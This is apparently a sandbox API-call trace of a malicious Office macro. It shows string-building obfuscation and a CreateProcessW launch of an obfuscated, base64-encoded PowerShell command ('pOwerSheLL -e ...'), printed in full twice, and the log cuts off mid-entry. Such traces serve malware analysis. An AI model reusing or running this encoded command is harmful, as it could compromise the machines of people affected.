bstrLeft="athdtPpxTktdHAPRvkDWhetKTvXVYRPFsPdvPFbHtBGhHNMBANNwaDds", bstrRight="aWYNtrrU", pbstrResult=0x125694 | out: pbstrResult=0x125694) returned 0x0 [0023.311] VarBstrCat (in: bstrLeft="athdtPpxTktdHAPRvkDWhetKTvXVYRPFsPdvPFbHtBGhHNMBANNwaDdsaWYNtrrU", bstrRight="BBXNYcWSP", pbstrResult=0x125694 | out: pbstrResult=0x125694) returned 0x0 [0023.312] VarBstrCmp (bstrLeft="False", bstrRight="athdtPpxTktdHAPRvkDWhetKTvXVYRPFsPdvPFbHtBGhHNMBANNwaDdsaWYNtrrUBBXNYcWSP", lcid=0x0, dwFlags=0x30001) returned 0x0 [0023.312] VarBstrCat (in: bstrLeft="Comme", bstrRight="nts", pbstrResult=0x125698 | out: pbstrResult=0x125698) returned 0x0 [0023.387] VarAdd (in: pvarLeft=0x12589c, pvarRight=0x1258ac, pvarResult=0x125b14 | out: pvarResult=0x125b14) returned 0x0 [0023.387] VarAdd (in: pvarLeft=0x125b14, pvarRight=0x12588c, pvarResult=0x125b04 | out: pvarResult=0x125b04) returned 0x0 [0023.387] VarAdd (in: pvarLeft=0x125b04, pvarRight=0x12587c, pvarResult=0x125ad0 | out: pvarResult=0x125ad0) returned 0x0 [0023.387] VarAdd (in: pvarLeft=0x125ad0, pvarRight=0x12586c, pvarResult=0x125ac0 | out: pvarResult=0x125ac0) returned 0x0 [0023.387] VarAdd (in: pvarLeft=0x125ac0, pvarRight=0x12585c, pvarResult=0x125ab0 | out: pvarResult=0x125ab0) returned 0x0 [0023.387] VarAdd (in: pvarLeft=0x125ab0, pvarRight=0x12584c, pvarResult=0x125a7c | out: pvarResult=0x125a7c) returned 0x0 [0023.387] VarAdd (in: pvarLeft=0x125a7c, pvarRight=0x12583c, pvarResult=0x125a6c | out: pvarResult=0x125a6c) returned 0x0 [0023.387] VarAdd (in: pvarLeft=0x125a6c, pvarRight=0x12582c, pvarResult=0x125a5c | out: pvarResult=0x125a5c) returned 0x0 [0023.387] VarAdd (in: pvarLeft=0x125a5c, pvarRight=0x125a18, pvarResult=0x125a08 | out: pvarResult=0x125a08) returned 0x0 [0023.425] VarAdd (in: pvarLeft=0x125a08, pvarRight=0x1258ac, pvarResult=0x1259d4 | out: pvarResult=0x1259d4) returned 0x0 [0023.425] VarAdd (in: pvarLeft=0x1259d4, pvarRight=0x12588c, pvarResult=0x1259c4 | out: pvarResult=0x1259c4) returned 0x0 [0023.425] VarAdd (in: pvarLeft=0x1259c4, pvarRight=0x12587c, pvarResult=0x1259b4 | out: pvarResult=0x1259b4) returned 0x0 [0023.425] VarAdd (in: pvarLeft=0x1259b4, pvarRight=0x12586c, pvarResult=0x12598c | out: pvarResult=0x12598c) returned 0x0 [0023.425] VarAdd (in: pvarLeft=0x12598c, pvarRight=0x12585c, pvarResult=0x12597c | out: pvarResult=0x12597c) returned 0x0 [0023.425] VarAdd (in: pvarLeft=0x12597c, pvarRight=0x12584c, pvarResult=0x125804 | out: pvarResult=0x125804) returned 0x0 [0023.425] VarAdd (in: pvarLeft=0x125804, pvarRight=0x12583c, pvarResult=0x1257f4 | out: pvarResult=0x1257f4) returned 0x0 [0023.426] VarAdd (in: pvarLeft=0x1257f4, pvarRight=0x12582c, pvarResult=0x1257e4 | out: pvarResult=0x1257e4) returned 0x0 [0023.426] VarAdd (in: pvarLeft=0x1257e4, pvarRight=0x1257d4, pvarResult=0x1257c4 | out: pvarResult=0x1257c4) returned 0x0 [0023.426] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="pOwerSheLL -e KAAnADMANgB9ADEAMQA5AHoAMQAxADUAQAA5ADkARwAxADEANABoADEAMAA1AGgAMQAxADIAZQAxADEANgBEADMAMgB9ADYAMQA+ADMAMgBHADEAMQAwAEQAMQAwADEAZQAxADEAOQBHADQANQB6ADEAMQAxAEQAOQA4AH0AMQAwADYAZQAxADAAMQBAADkAOQB9ADEAMQA2AD4AMwAyAD4ANAA1AH0ANgA3AHoAMQAxADEARwAxADAAOQBEADcAOQBlADkAOABoADEAMAA2AGUAMQAwADEAegA5ADkAegAxADEANgB6ADMAMgB6ADgANwA+ADgAMwB6ADkAOQBEADEAMQA0AEcAMQAwADUAfQAxADEAMgBTADEAMQA2AEcANAA2AEQAOAAzAH0AMQAwADQARwAxADAAMQBTADEAMAA4AHoAMQAwADgAdgA1ADkAaAAzADYAegAxADEAOQB9ADEAMAAxAHoAOQA4AD4AOQA5AH0AMQAwADgAPgAxADAANQBEADEAMAAxAHoAMQAxADAAdgAxADEANgB2ADMAMgB6ADYAMQB2ADMAMgBlADEAMQAwAEAAMQAwADEAfQAxADEAOQB2ADQANQBAADEAMQAxAHYAOQA4AHYAMQAwADYAUwAxADAAMQBAADkAOQB6ADEAMQA2AHYAMwAyAGgAOAAzAGgAMQAyADEAPgAxADEANQBEADEAMQA2AHYAMQAwADEAQAAxADAAOQBAADQANgB9ADcAOAA+ADEAMAAxAGgAMQAxADYAUwA0ADYAdgA4ADcAZQAxADAAMQBTADkAOAB9ADYANwBoADEAMAA4AH0AMQAwADUAQAAxADAAMQBlADEAMQAwAEQAMQAxADYAaAA1ADkAUwAzADYAfQAxADEANABAADkANwBlADEAMQAwAEcAMQAwADAAegAxADEAMQB6ADEAMAA5AHoAMwAyAEAANgAxAD4AMwAyAEQAMQAxADAAPgAxADAAMQB6ADEAMQA5AGgANAA1AH0AMQAxADEAaAA5ADgAegAxADAANgBEADEAMAAxAGUAOQA5AGUAMQAxADYAaAAzADIARAAxADEANAB6ADkANwBoADEAMQAwAEcAMQAwADAAPgAxADEAMQBTADEAMAA5AH0ANQA5AEQAMwA2AGUAMQAxADcAegAxADEANABEADEAMAA4AGUAMQAxADUAaAAzADIAfQA2ADEAZQAzADIAZQAzADkAUwAxADAANABHADEAMQA2AEQAMQAxADYAaAAxADEAMgBHADUAOABoADQANwB6ADQANwA+ADEAMQAwAH0AMQAwADEAdgA5ADcAQAAxADAANwBEADEAMAA5AH0AMQAwADEAPgAxADAAMAB9ADEAMAA1AEQAOQA3AD4ANAA2AHYAOQA5AHoAMQAxADEAZQAxADAAOQBTADQANwBAADEAMAA0AGgAMQAyADEAQAA5ADgAUwAxADAAMgBEADgAMAB6ADYAOAB2ADkAOQB6ADcANgB6ADQANwBTADQANABTADEAMAA0AH0AMQAxADYAUwAxADEANgBoADEAMQAyAGUANQA4AEcANAA3AEQANAA3AHoAMQAxADIAZQAxADEANABHADEAMQAyAEQAMQAxADQAUwAxADEAMQB2ADEAMAAwAEcAMQAxADcARwA5ADkAUwAxADEANgBEADEAMAA1AH0AMQAxADEARwAxADEAMAB9ADEAMQA1AEQANAA2AEcAOQA5AD4AMQAxADEAaAAxADAAOQB6ADQANwBlADgAMQBHADEAMAAzAGUANwA0AEQANAA3AHoANAA0AEAAMQAwADQAfQAxADEANgBHADEAMQA2AGgAMQAxADIAQAA1ADgARwA0ADcAUwA0ADcAZQAxADAAOQBTADkANwB9ADEAMAA4AHoAMQAwADgAUwAxADEANwBEADkAOQB6ADEAMAA0AEcANAA2AHYAOQA5AH0AMQAxADEAaAAxADAAOQBEADQANwB2ADcANgBAADYANgBHADQANwB6ADQANAB6ADEAMAA0AEAAMQAxADYAPgAxADEANgBTADEAMQAyAGgANQA4AFMANAA3AGUANAA3AEcAMQAxADAARAAxADEAMQBAADEAMQA0AD4AMQAwADUAUwAxADEAOQB9ADEAMAAxAGgAOQA4AEAANAA2AHYAMQAxADAAQAAxADAAMQBTADEAMQA2AGUANAA3AHYAMQAxADAAfQA4ADQAPgAxADAAOQBlADgAMABoADcAMABlADEAMQA5AFMANAA3AHoANAA0AEcAMQAwADQAfQAxADEANgA+ADEAMQA2AD4AMQAxADIARAA1ADgAUwA0ADcAUwA0ADcAZQAxADEANgBHADkANwB9ADEAMgAwAH0AOQA3AEcAMQAxADYAQAAxADAANQA+ADEAMQAxAEAAMQAxADAAfQA0ADUAZQAxADAANABlADEAMAA3AHoANAA2AHoAOQA5AD4AMQAxADEAZQAxADAAOQB2ADQANwBEADEAMAAwAD4ANwA2AGgAOAAwAFMAMQAyADIARwAxADIAMQBHADQANwA+ADMAOQA+ADQANgB6ADgAMwBlADEAMQAyAFMAMQAwADgAegAxADAANQB9ADEAMQA2AEcANAAwAD4AMwA5AFMANAA0AFMAMwA5AEQANAAxAEcANQA5AEQAMwA2AGgAMQAxADAAegA5ADcAegAxADAAOQBoADEAMAAxAEcAMwAyAEAANgAxAHoAMwAyAEAAMwA2AEAAMQAxADQAZQA5ADcAegAxADEAMABHADEAMAAwAH0AMQAxADEAfQAxADAAOQA+ADQANgB6ADEAMQAwAD4AMQAwADEAfQAxADIAMABHADEAMQA2AD4ANAAwAH0ANAA5AHoANAA0AGgAMwAyAHoANQA0AD4ANQAzAHYANQAzAEAANQAxAEcANQA0AFMANAAxAH0ANQA5AEQAMwA2AHoAMQAxADIAdgA5ADcAQAAxADEANgBHADEAMAA0AHYAMwAyAHYANgAxAGUAMwAyAFMAMwA2AGUAMQAwADEAfQAxADEAMAB6ADEAMQA4AH0ANQA4AHoAMQAxADYAfQAxADAAMQB9ADEAMAA5AEcAMQAxADIAZQAzADIARAA0ADMAdgAzADIAZQAzADkAaAA5ADIAegAzADkAQAAzADIARwA0ADMAZQAzADIAZQAzADYAfQAxADEAMAB2ADkANwB2ADEAMAA5AEQAMQAwADEAdgAzADIAaAA0ADMAUwAzADIAUwAzADkAUwA0ADYAfQAxADAAMQBAADEAMgAwAGUAMQAwADEAUwAzADkAZQA1ADkAZQAxADAAMgBAADEAMQAxAEQAMQAxADQARwAxADAAMQBEADkANwB2ADkAOQB6ADEAMAA0AEAANAAwAEcAMwA2AD4AMQAxADcAUwAxADEANABTADEAMAA4AGUAMwAyAGgAMQAwADUAdgAxADEAMABAADMAMgBlADMANgBTADEAMQA3AGgAMQAxADQARwAxADAAOABEADEAMQA1AGgANAAxAGUAMQAyADMAdgAxADEANgBAADEAMQA0AFMAMQAyADEAdgAxADIAMwB2ADMANgBlADEAMQA5AGUAMQAwADEAaAA5ADgARwA5ADkAfQAxADAAOAB6ADEAMAA1AHoAMQAwADEAfQAxADEAMABEADEAMQA2AGgANAA2AEQANgA4AHYAMQAxADEAUwAxADEAOQBHADEAMQAwAHoAMQAwADgAdgAxADEAMQBEADkANwBTADEAMAAwAGgANwAwAHoAMQAwADUAegAxADAAOAB9ADEAMAAxAH0ANAAwAGUAMwA2AEQAMQAxADcAZQAxADEANAA+ADEAMAA4AD4ANAA2AGgAOAA0AEcAMQAxADEARAA4ADMAfQAxADEANgBoADEAMQA0AH0AMQAwADUAegAxADEAMABAADEAMAAzAD4ANAAwAGUANAAxAGgANAA0AEQAMwAyAH0AMwA2AEcAMQAxADIARAA5ADcAPgAxADEANgBoADEAMAA0AEcANAAxAHoANQA5AEAAOAAzAD4AMQAxADYAPgA5ADcAaAAxADEANABAADEAMQA2AGUANAA1AFMAOAAwAH0AMQAxADQARwAxADEAMQBoADkAOQBAADEAMAAxAH0AMQAxADUARwAxADEANQB2ADMAMgBTADMANgBlADEAMQAyAEQAOQA3AFMAMQAxADYAdgAxADAANAA+ADUAOQBoADkAOABHADEAMQA0AGgAMQAwADEAfQA5ADcAaAAxADAANwB9ADUAOQB6ADEAMgA1AEAAOQA5AEcAOQA3AGUAMQAxADYAPgA5ADkAZQAxADAANABHADEAMgAzAEAAMQAxADkAdgAxADEANAA+ADEAMAA1AGUAMQAxADYAaAAxADAAMQBAADQANQBTADEAMAA0AHoAMQAxADEAaAAxADEANQB2ADEAMQA2AEQAMwAyAGgAMwA2AEAAOQA1AGgANAA2AEcANgA5AD4AMQAyADAAaAA5ADkAUwAxADAAMQBHADEAMQAyAEAAMQAxADYAaAAxADAANQBAADEAMQAxAEQAMQAxADAAUwA0ADYAPgA3ADcAaAAxADAAMQBlADEAMQA1AHoAMQAxADUAPgA5ADcAaAAxADAAMwBAADEAMAAxAGgANQA5AHoAMQAyADUAaAAxADIANQAnACAALQBzAFAAbABJAFQAIAAnAHoAJwAtAFMAcABMAGkAdAAgACcAZQAnACAALQBzAFAAbABpAHQAJwA+ACcAIAAtAFMAcABMAGkAVAAgACcAUwAnAC0AcwBwAGwASQBUACcARAAnAC0AUwBwAGwASQBUACcAfQAnAC0AUwBQAGwAaQB0ACAAJwBHACcALQBzAHAAbABpAHQAJwBoACcALQBTAFAATABpAFQAIAAnAEAAJwAtAFMAcABsAGkAdAAnAHYAJwB8ACAAJQB7ACgAIABbAGkATgB0AF0AJABfACAALQBhAFMAWwBDAGgAYQBSAF0AKQAgAH0AKQAtAGoAbwBpAE4AJwAnACAAfAAgACYAKAAgACQAUABTAEgATwBNAEUAWwAyADEAXQArACQAU", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12565c*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12564c | out: lpCommandLine="pOwerSheLL -e KAAnADMANgB9ADEAMQA5AHoAMQAxADUAQAA5ADkARwAxADEANABoADEAMAA1AGgAMQAxADIAZQAxADEANgBEADMAMgB9ADYAMQA+ADMAMgBHADEAMQAwAEQAMQAwADEAZQAxADEAOQBHADQANQB6ADEAMQAxAEQAOQA4AH0AMQAwADYAZQAxADAAMQBAADkAOQB9ADEAMQA2AD4AMwAyAD4ANAA1AH0ANgA3AHoAMQAxADEARwAxADAAOQBEADcAOQBlADkAOABoADEAMAA2AGUAMQAwADEAegA5ADkAegAxADEANgB6ADMAMgB6ADgANwA+ADgAMwB6ADkAOQBEADEAMQA0AEcAMQAwADUAfQAxADEAMgBTADEAMQA2AEcANAA2AEQAOAAzAH0AMQAwADQARwAxADAAMQBTADEAMAA4AHoAMQAwADgAdgA1ADkAaAAzADYAegAxADEAOQB9ADEAMAAxAHoAOQA4AD4AOQA5AH0AMQAwADgAPgAxADAANQBEADEAMAAxAHoAMQAxADAAdgAxADEANgB2ADMAMgB6ADYAMQB2ADMAMgBlADEAMQAwAEAAMQAwADEAfQAxADEAOQB2ADQANQBAADEAMQAxAHYAOQA4AHYAMQAwADYAUwAxADAAMQBAADkAOQB6ADEAMQA2AHYAMwAyAGgAOAAzAGgAMQAyADEAPgAxADEANQBEADEAMQA2AHYAMQAwADEAQAAxADAAOQBAADQANgB9ADcAOAA+ADEAMAAxAGgAMQAxADYAUwA0ADYAdgA4ADcAZQAxADAAMQBTADkAOAB9ADYANwBoADEAMAA4AH0AMQAwADUAQAAxADAAMQBlADEAMQAwAEQAMQAxADYAaAA1ADkAUwAzADYAfQAxADEANABAADkANwBlADEAMQAwAEcAMQAwADAAegAxADEAMQB6ADEAMAA5AHoAMwAyAEAANgAxAD4AMwAyAEQAMQAxADAAPgAxADAAMQB6ADEAMQA5AGgANAA1AH0AMQAxADEAaAA5ADgAegAxADAANgBEADEAMAAxAGUAOQA5AGUAMQAxADYAaAAzADIARAAxADEANAB6ADkANwBoADEAMQAwAEcAMQAwADAAPgAxADEAMQBTADEAMAA5AH0ANQA5AEQAMwA2AGUAMQAxADcAegAxADEANABEADEAMAA4AGUAMQAxADUAaAAzADIAfQA2ADEAZQAzADIAZQAzADkAUwAxADAANABHADEAMQA2AEQAMQAxADYAaAAxADEAMgBHADUAOABoADQANwB6ADQANwA+ADEAMQAwAH0AMQAwADEAdgA5ADcAQAAxADAANwBEADEAMAA5AH0AMQAwADEAPgAxADAAMAB9ADEAMAA1AEQAOQA3AD4ANAA2AHYAOQA5AHoAMQAxADEAZQAxADAAOQBTADQANwBAADEAMAA0AGgAMQAyADEAQAA5ADgAUwAxADAAMgBEADgAMAB6ADYAOAB2ADkAOQB6ADcANgB6ADQANwBTADQANABTADEAMAA0AH0AMQAxADYAUwAxADEANgBoADEAMQAyAGUANQA4AEcANAA3AEQANAA3AHoAMQAxADIAZQAxADEANABHADEAMQAyAEQAMQAxADQAUwAxADEAMQB2ADEAMAAwAEcAMQAxADcARwA5ADkAUwAxADEANgBEADEAMAA1AH0AMQAxADEARwAxADEAMAB9ADEAMQA1AEQANAA2AEcAOQA5AD4AMQAxADEAaAAxADAAOQB6ADQANwBlADgAMQBHADEAMAAzAGUANwA0AEQANAA3AHoANAA0AEAAMQAwADQAfQAxADEANgBHADEAMQA2AGgAMQAxADIAQAA1ADgARwA0ADcAUwA0ADcAZQAxADAAOQBTADkANwB9ADEAMAA4AHoAMQAwADgAUwAxADEANwBEADkAOQB6ADEAMAA0AEcANAA2AHYAOQA5AH0AMQAxADEAaAAxADAAOQBEADQANwB2ADcANgBAADYANgBHADQANwB6ADQANAB6ADEAMAA0AEAAMQAxADYAPgAxADEANgBTADEAMQAyAGgANQA4AFMANAA3AGUANAA3AEcAMQAxADAARAAxADEAMQBAADEAMQA0AD4AMQAwADUAUwAxADEAOQB9ADEAMAAxAGgAOQA4AEAANAA2AHYAMQAxADAAQAAxADAAMQBTADEAMQA2AGUANAA3AHYAMQAxADAAfQA4ADQAPgAxADAAOQBlADgAMABoADcAMABlADEAMQA5AFMANAA3AHoANAA0AEcAMQAwADQAfQAxADEANgA+ADEAMQA2AD4AMQAxADIARAA1ADgAUwA0ADcAUwA0ADcAZQAxADEANgBHADkANwB9ADEAMgAwAH0AOQA3AEcAMQAxADYAQAAxADAANQA+ADEAMQAxAEAAMQAxADAAfQA0ADUAZQAxADAANABlADEAMAA3AHoANAA2AHoAOQA5AD4AMQAxADEAZQAxADAAOQB2ADQANwBEADEAMAAwAD4ANwA2AGgAOAAwAFMAMQAyADIARwAxADIAMQBHADQANwA+ADMAOQA+ADQANgB6ADgAMwBlADEAMQAyAFMAMQAwADgAegAxADAANQB9ADEAMQA2AEcANAAwAD4AMwA5AFMANAA0AFMAMwA5AEQANAAxAEcANQA5AEQAMwA2AGgAMQAxADAAegA5ADcAegAxADAAOQBoADEAMAAxAEcAMwAyAEAANgAxAHoAMwAyAEAAMwA2AEAAMQAxADQAZQA5ADcAegAxADEAMABHADEAMAAwAH0AMQAxADEAfQAxADAAOQA+ADQANgB6ADEAMQAwAD4AMQAwADEAfQAxADIAMABHADEAMQA2AD4ANAAwAH0ANAA5AHoANAA0AGgAMwAyAHoANQA0AD4ANQAzAHYANQAzAEAANQAxAEcANQA0AFMANAAxAH0ANQA5AEQAMwA2AHoAMQAxADIAdgA5ADcAQAAxADEANgBHADEAMAA0AHYAMwAyAHYANgAxAGUAMwAyAFMAMwA2AGUAMQAwADEAfQAxADEAMAB6ADEAMQA4AH0ANQA4AHoAMQAxADYAfQAxADAAMQB9ADEAMAA5AEcAMQAxADIAZQAzADIARAA0ADMAdgAzADIAZQAzADkAaAA5ADIAegAzADkAQAAzADIARwA0ADMAZQAzADIAZQAzADYAfQAxADEAMAB2ADkANwB2ADEAMAA5AEQAMQAwADEAdgAzADIAaAA0ADMAUwAzADIAUwAzADkAUwA0ADYAfQAxADAAMQBAADEAMgAwAGUAMQAwADEAUwAzADkAZQA1ADkAZQAxADAAMgBAADEAMQAxAEQAMQAxADQARwAxADAAMQBEADkANwB2ADkAOQB6ADEAMAA0AEAANAAwAEcAMwA2AD4AMQAxADcAUwAxADEANABTADEAMAA4AGUAMwAyAGgAMQAwADUAdgAxADEAMABAADMAMgBlADMANgBTADEAMQA3AGgAMQAxADQARwAxADAAOABEADEAMQA1AGgANAAxAGUAMQAyADMAdgAxADEANgBAADEAMQA0AFMAMQAyADEAdgAxADIAMwB2ADMANgBlADEAMQA5AGUAMQAwADEAaAA5ADgARwA5ADkAfQAxADAAOAB6ADEAMAA1AHoAMQAwADEAfQAxADEAMABEADEAMQA2AGgANAA2AEQANgA4AHYAMQAxADEAUwAxADEAOQBHADEAMQAwAHoAMQAwADgAdgAxADEAMQBEADkANwBTADEAMAAwAGgANwAwAHoAMQAwADUAegAxADAAOAB9ADEAMAAxAH0ANAAwAGUAMwA2AEQAMQAxADcAZQAxADEANAA+ADEAMAA4AD4ANAA2AGgAOAA0AEcAMQAxADEARAA4ADMAfQAxADEANgBoADEAMQA0AH0AMQAwADUAegAxADEAMABAADEAMAAzAD4ANAAwAGUANAAxAGgANAA0AEQAMwAyAH0AMwA2AEcAMQAxADIARAA5ADcAPgAxADEANgBoADEAMAA0AEcANAAxAHoANQA5AEAAOAAzAD4AMQAxADYAPgA5ADcAaAAxADEANABAADEAMQA2AGUANAA1AFMAOAAwAH0AMQAxADQARwAxADEAMQBoADkAOQBAADEAMAAxAH0AMQAxADUARwAxADEANQB2ADMAMgBTADMANgBlADEAMQAyAEQAOQA3AFMAMQAxADYAdgAxADAANAA+ADUAOQBoADkAOABHADEAMQA0AGgAMQAwADEAfQA5ADcAaAAxADAANwB9ADUAOQB6ADEAMgA1AEAAOQA5AEcAOQA3AGUAMQAxADYAPgA5ADkAZQAxADAANABHADEAMgAzAEAAMQAxADkAdgAxADEANAA+ADEAMAA1AGUAMQAxADYAaAAxADAAMQBAADQANQBTADEAMAA0AHoAMQAxADEAaAAxADEANQB2ADEAMQA2AEQAMwAyAGgAMwA2AEAAOQA1AGgANAA2AEcANgA5AD4AMQAyADAAaAA5ADkAUwAxADAAMQBHADEAMQAyAEAAMQAxADYAaAAxADAANQBAADEAMQAxAEQAMQAxADAAUwA0ADYAPgA3ADcAaAAxADAAMQBlADEAMQA1AHoAMQAxADUAPgA5ADcAaAAxADAAMwBAADEAMAAxAGgANQA5AHoAMQAyADUAaAAxADIANQAnACAALQBzAFAAbABJAFQAIAAnAHoAJwAtAFMAcABMAGkAdAAgACcAZQAnACAALQBzAFAAbABpAHQAJwA+ACcAIAAtAFMAcABMAGkAVAAgACcAUwAnAC0AcwBwAGwASQBUACcARAAnAC0AUwBwAGwASQBUACcAfQAnAC0AUwBQAGwAaQB0ACAAJwBHACcALQBzAHAAbABpAHQAJwBoACcALQBTAFAATABpAFQAIAAnAEAAJwAtAFMAcABsAGkAdAAnAHYAJwB8ACAAJQB7ACgAIABbAGkATgB0AF0AJABfACAALQBhAFMAWwBDAGgAYQBSAF0AKQAgAH0AKQAtAGoAbwBpAE4AJwAnACAAfAAgACYAKAAgACQAUABTAEgATwBNAEUAWwAyADEAXQArACQAU", lpProcessInformation=0x12564c*(hProcess=0x5d0, hThread=0x5cc, dwProcessId=0xa68, dwThreadId=0xa6c)) returned 1 [0023.438] GetLastError () returned 0x0 [0023.438] WaitForInputIdle (hProcess=0x5d0, dwMilliseconds=0x2710) returned 0xffffffff [0023.438] CloseHandle (hObject=0x5cc) returned 1 [0023.438] CloseHandle (hObject=0x5d0) returned 1 [0023.452] VarBstrCat (in: bstrLeft="zAEMZgBXATm", bstrRight="ZAhxtXm", pbstrResult=0x125698 | out: pbstrResult=0x125698) returned 0x0 [0023.452] VarBstrCat (in: bstrLeft="zAEMZgBXATmZAhxtXm", bstrRight="xBCMkTRArZs", pbstrResult=0x125698 | out: pbstrResult=0x125698) returned 0x0 [0023.452] VarBstrCat (in: bstrLeft="zAEMZgBXATmZAhxtXmxBCMkTRArZs", bstrRight="mcfPrznnKB", pbstrResult=0x125698 | out: pbstrResult=0x125698) returned 0x0 [0023.452] VarBstrCat (in: bstrLeft="zAEMZgBXATmZAhxtXmxBCMkTRArZsmcfPrznnKB", bstrRight="ztXTTLkrshU", pbstrResult=0x125698 | out: pbstrResult=0x125698) returned 0x0 [0023.452] VarBstrCat (in: bstrLeft="zAEMZgBXATmZAhxtXmxBCMkTRArZsmcfPrznnKBztXTTLkrshU", bstrRight="BAnrHda", pbstrResult=0x125698 | out: pbstrResult=0x125698) returned 0x0 [0023.452] VarBstrCat (in: bstrLeft="zAEMZgBXATmZAhxtXmxBCMkTRArZsmcfPrznnKBztXTTLkrshUBAnrHda", bstrRight="BLfMSWdEN", pbstrResult=0x125698 | out: pbstrResult=0x125698) returned 0x0 [0023.452] VarAdd (in: pvarLeft=0x125b14, pvarRight=0x1257ac, pvarResult=0x125b04 | out: pvarResult=0x125b04) returned 0x0 [0023.452] VarBstrCat (in: bstrLeft="NEYBPbz", bstrRight="dYbUxrTzA", pbstrResult=0x125694 | out: pbstrResult=0x125694) returned 0x0 [0023.452] VarBstrCat (in: bstrLeft="NEYBPbzdYbUxrTzA", bstrRight="bkYNBvcKf", pbstrResult=0x125694 | out: pbstrResult=0x125694) returned 0x0 [0023.452] VarBstrCat (in: bstrLeft="NEYBPbzdYbUxrTzAbkYNBvcKf", bstrRight="aGBNkUbhS", pbstrResult=0x125694 | out: pbstrResult=0x125694) returned 0x0 [0023.452] VarBstrCat (in: bstrLeft="NEYBPbzdYbUxrTzAbkYNBvcKfaGBNkUbhS", bstrRight="FLNYbpdHPzh", pbstrResult=0x125694 | out: pbstrResult=0x125694) returned 0x0 [0023.452] VarBstrCat (in: bstrLeft="NEYBPbzdYbUxrTzAbkYNBvcKfaGBNkUbhSFLNYbpdHPzh", bstrRight="cUhhPCMMK", pbstrResult=0x125694 | out: pbstrResult=0x125694) returned 0x0 [0023.452] VarBstrCat (in: bstrLeft="NEYBPbzdYbUxrTzAbkYNBvcKfaGBNkUbhSFLNYbpdHPzhcUhhPCMMK", bstrRight="HppCTmXYAx", pbstrResult=0x125694 | out: pbstrResult=0x125694) returned 0x0 [0023.452] VarAdd (in: pvarLeft=0x125ad0, pvarRight=0x12579c, pvarResult=0x125ac0 | out: pvarResult=0x125ac0) returned 0x0 [0023.452] VarCmp (pvarLeft=0x125b04, pvarRight=0x125ac0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0023.452] VarBstrCat (in: bstrLeft="uUMbeAYf", bstrRight="CwZEARSew", pbstrResult=0x125694 | out: pbstrResult=0x125694) returned 0x0 [0023.452] VarBstrCat (in: bstrLeft="uUMbeAYfCwZEARSew", bstrRight="zMBsKCF", pbstrResult=0x125694 | out: pbstrResult=0x125694) returned 0x0 [0023.452] VarBstrCat (in: bstrLeft="uUMbeAYfCwZEARSewzMBsKCF", bstrRight="uUmexuzkFwn", pbstrResult=0x125694 | out: pbstrResult=0x125694) returned 0x0 [0023.452] VarBstrCat (in: bstrLeft="uUMbeAYfCwZEARSewzMBsKCFuUmexuzkFwn", bstrRight="cpvscrP", pbstrResult=0x125694 | out: pbstrResult=0x125694) returned 0x0 [0023.452] VarBstrCat (in: bstrLeft="uUMbeAYfCwZEARSewzMBsKCFuUmexuzkFwncpvscrP", bstrRight="FbzEWuRyRZX", pbstrResult=0x125694 | out: pbstrResult=0x125694) returned 0x0 [0023.452] VarBstrCat (in: bstrLeft="uUMbeAYfCwZEARSewzMBsKCFuUmexuzkFwncpvscrPFbzEWuRyRZX", bstrRight="wMMASWhrfC", pbstrResult=0x125694 | out: pbstrResult=0x125694) returned 0x0 [0023.452] VarAdd (in: pvarLeft=0x125a7c, pvarRight=0x12578c, pvarResult=0x125a6c | out: pvarResult=0x125a6c) returned 0x0 [0023.452] VarBstrCat (in: bstrLeft="PrgRADKSZKD", bstrRight="PNAAMkm", pbstrResult=0x125694 | out: pbstrResult=0x125694) returned 0x0 [0023.452] VarBstrCat (in: bstrLeft="PrgRADKSZKDPNAAMkm", bstrRight="MvarReXTzeC", pbstrResult=0x125694 | out: pbstrResult=0x125694) returned 0x0 [0023.453] VarBstrCat (in: bstrLeft="PrgRADKSZKDPNAAMkmMvarReXTzeC", bstrRight="frYcTFUe", pbstrResult=0x125694 | out: pbstrResult=0x125694) returned 0x0 [0023.453] VarBstrCat (in: bstrLeft="PrgRADKSZKDPNAAMkmMvarReXTzeCfrYcTFUe", bstrRight="grUpbNyy", pbstrResult=0x125694 | out: pbstrResult=0x125694) returned 0x0 [0023.453] VarBstrCat (in: bstrLeft="PrgRADKSZKDPNAAMkmMvarReXTzeCfrYcTFUegrUpbNyy", bstrRight="KvuseXBhC", pbstrResult=0x125694 | out: pbstrResult=0x125694) returned 0x0 [0023.453] VarBstrCat (in: bstrLeft="PrgRADKSZKDPNAAMkmMvarReXTzeCfrYcTFUegrUpbNyyKvuseXBhC", bstrRight="LdRscrpCp", pbstrResult=0x125694 | out: pbstrResult=0x125694) returned 0x0 [0023.453] VarAdd (in: pvarLeft=0x125a28, pvarRight=0x12577c, pvarResult=0x125a18 | out: pvarResult=0x125a18) returned 0x0 [0023.453] VarBstrCat (in: bstrLeft="EXXvpXyv", bstrRight="xEdcpyZnERE", pbstrResult=0x125694 | out: pbstrResult=0x125694) returned 0x0 [0023.453] VarBstrCat (in: bstrLeft="EXXvpXyvxEdcpyZnERE", bstrRight="LUHHCmphpXR", pbstrResult=0x125694 | out: pbstrResult=0x125694) returned 0x0 [0023.453] VarBstrCat (in: bstrLeft="EXXvpXyvxEdcpyZnERELUHHCmphpXR", bstrRight="SyuBTBGSG", pbstrResult=0x125694 | out: pbstrResult=0x125694) returned 0x0 [0023.453] VarBstrCat (in: bstrLeft="EXXvpXyvxEdcpyZnERELUHHCmphpXRSyuBTBGSG", bstrRight="EBfdfaWP", pbstrResult=0x125694 | out: pbstrResult=0x125694) returned 0x0 [0023.453] VarBstrCat (in: bstrLeft="EXXvpXyvxEdcpyZnERELUHHCmphpXRSyuBTBGSGEBfdfaWP", bstrRight="MtgxaGC", pbstrResult=0x125694 | out: pbstrResult=0x125694) returned 0x0 [0023.453] VarBstrCat (in: bstrLeft="EXXvpXyvxEdcpyZnERELUHHCmphpXRSyuBTBGSGEBfdfaWPMtgxaGC", bstrRight="PfxYdtzCWtb", pbstrResult=0x125694 | out: 